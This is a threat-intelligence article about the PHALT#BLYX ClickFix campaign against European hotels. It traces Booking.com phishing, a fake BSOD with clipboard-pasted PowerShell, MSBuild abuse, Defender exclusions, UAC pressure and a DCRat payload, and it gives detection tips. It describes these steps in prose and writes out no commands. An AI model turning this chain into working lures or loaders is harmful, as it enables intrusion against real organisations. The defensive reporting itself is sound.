A sophisticated ClickFix attack has been observed targeting organizations in the hospitality sector, using fake Windows Blue Screen of Death (BSOD) screens and trusted system utilities to trick users into manually executing malware on their own systems. The campaign, tracked by security researchers as PHALT#BLYX, relies entirely on social engineering rather than software vulnerabilities, making it particularly effective against pressured or non-technical users.
Unlike traditional malware attacks that exploit flaws in operating systems or applications, this campaign convinces victims to perform the malicious actions themselves. By abusing familiar Windows interfaces, trusted Microsoft binaries, and realistic phishing lures, the attackers are able to bypass many standard security controls and establish persistent remote access.
Overview of the ClickFix Social Engineering Technique
ClickFix attacks are a form of social engineering where victims are presented with an apparent system error or security issue and are then guided through steps to “fix” the problem. These steps are designed to look like legitimate troubleshooting actions but instead result in the execution of malicious commands.
Common ClickFix lures include fake browser errors, CAPTCHA failures, update prompts, and security warnings. In this campaign, the attackers escalate the deception by simulating a full Windows Blue Screen of Death, a screen most users associate with critical system failure.
By creating a moment of panic and urgency, the attackers reduce the likelihood that the victim will question the instructions being presented.
PHALT#BLYX Campaign Targeting the Hospitality Sector
The PHALT#BLYX campaign has been observed primarily targeting hospitality organizations, particularly hotels and accommodation providers across Europe. The phishing emails used in this operation impersonate Booking.com and claim that a guest has cancelled a reservation involving a significant financial charge, often exceeding €1,000.
This tactic exploits the fast-paced nature of hospitality operations, where staff are accustomed to handling booking disputes, refunds, and customer complaints quickly. The presence of large euro-denominated charges suggests a deliberate focus on European organizations.
Initial Infection Vector: Phishing Email Lure
The attack begins with a phishing email crafted to resemble official correspondence from Booking.com. The message typically references a reservation cancellation and includes a call to action such as “See Details” to review the charge.
The urgency created by the financial amount encourages recipients to click the link without verifying its legitimacy. Instead of directing users to the real Booking.com platform, the link routes through intermediate redirectors before landing on a malicious domain controlled by the attackers.
Stage One: Fake Booking.com Website
The malicious landing page is a high-fidelity clone of the legitimate Booking.com interface. It uses accurate branding, color schemes, fonts, and layout, making it difficult to distinguish from the real site at a glance.
Rather than displaying reservation details, the page presents a fake browser error message stating that the page is taking too long to load. A prominent “Refresh page” button is displayed, but this element is not a native browser control. It is a scripted component designed to trigger the next stage of the attack.
At the time of analysis, the malicious domain hosting this page remained largely undetected by web filtering solutions, allowing the attackers to reach victims without interruption.
Stage Two: Fake BSOD and ClickFix Execution
When the victim clicks the fake refresh button, the browser immediately switches to full-screen mode and displays a simulated Windows Blue Screen of Death. The sudden appearance of a BSOD is intended to shock the user and create the impression that their system has crashed.
Over the fake crash screen, instructions appear telling the user how to “fix” the issue. The steps typically instruct the victim to open the Windows Run dialog using the Windows key and R, paste clipboard contents using CTRL and V, and then press Enter.
What the victim does not realize is that a malicious PowerShell command was silently copied to their clipboard when they interacted with the page. By following the on-screen instructions, the user manually pastes and executes the malware themselves.
This ClickFix technique is particularly effective because it bypasses many protections that focus on blocking automated execution.
Stage Three: PowerShell Dropper Execution
The pasted command launches a PowerShell script that performs multiple actions in quick succession. First, it opens a legitimate Booking.com administrative page in the user’s browser as a decoy, reinforcing the illusion that the action was safe.
In the background, the script searches the system for a legitimate copy of MSBuild.exe, the Microsoft Build Engine included with the .NET framework. Once found, it downloads a malicious MSBuild project file, commonly named v.proj, and saves it to the ProgramData directory.
The script then executes MSBuild.exe with the downloaded project file as input, causing MSBuild to compile and execute the embedded malicious code.
Abuse of MSBuild and Living off the Land Techniques
Using MSBuild.exe is a classic Living off the Land technique. MSBuild is a trusted, signed Microsoft binary that is commonly allowed to run by security products and application control policies.
The malicious project file contains inline code that MSBuild executes as part of its normal operation. Because the execution is performed by a trusted utility, basic defenses may not flag the activity as suspicious.
This shift to MSBuild-based execution represents an evolution from earlier variants of the campaign, which relied on simpler methods such as HTML application files executed via mshta.exe. Those earlier approaches were easier for antivirus software to detect.
Defense Evasion and Privilege Handling
Once executed, the MSBuild project attempts to evade detection by modifying Windows Defender settings. It adds exclusions for key directories and file extensions, ensuring that subsequent malware components are ignored by real-time scanning.
The malware then checks whether it is running with administrative privileges. If it already has elevated access, it proceeds to disable real-time protection, download the main payload using the Background Intelligent Transfer Service, and establish persistence.
If administrative privileges are not available, the malware repeatedly triggers User Account Control prompts in an attempt to pressure the user into granting elevated access.
Final Payload: DCRat Remote Access Trojan
The final payload deployed in this campaign is DCRat, a remote access Trojan widely used by threat actors for long-term system control. The malware is delivered as a heavily obfuscated .NET binary and injected into legitimate system processes using process hollowing techniques.
Once active, DCRat establishes a connection to its command-and-control infrastructure and sends a detailed fingerprint of the infected system. This includes information about the operating system, user privileges, antivirus software, domain membership, and active processes.
The malware supports a wide range of malicious capabilities, including remote desktop access, keylogging, reverse shell execution, and the ability to load additional payloads directly into memory. In observed cases, attackers used this access to deploy cryptocurrency miners, though the same access could be used for data theft or lateral movement.
Attribution Indicators and Threat Actor Profile
Analysis of the malicious project files revealed the presence of Cyrillic-language debug strings embedded in the code. These strings appear to be written in natural Russian rather than machine-translated text, suggesting a Russian-speaking developer or the use of a Russian-origin malware kit.
DCRat itself is commonly sold and distributed within Russian-speaking underground communities, further supporting this attribution. While definitive attribution is difficult, these indicators align with known Russian-linked threat actor activity.
Why This ClickFix Attack Is Effective
This campaign succeeds because it combines psychological pressure with technical abuse of trusted system components. Victims are placed under stress by fake financial disputes, confronted with realistic system failure screens, and then guided step by step into executing the malware themselves.
By the time traditional security controls react, the malware has already established persistence and blended into legitimate system processes.
Indicators of Compromise and Detection Challenges
Organizations should be alert for unusual execution of MSBuild.exe, especially when project files originate from non-standard directories such as ProgramData. The creation of .proj files, unexpected Windows Defender exclusions, and the presence of Internet Shortcut files in Startup folders are additional warning signs.
Monitoring clipboard activity, PowerShell execution logs, and unexpected outbound network connections from legitimate system binaries can also help detect similar attacks.
MITRE ATT&CK Techniques Observed
This campaign maps to multiple MITRE ATT&CK techniques, including phishing via spearphishing links, PowerShell execution, trusted developer utilities proxy execution using MSBuild, defense evasion through security control modification, process injection, and persistence via startup execution.
Understanding how these techniques are chained together is critical for building effective detection and response strategies.
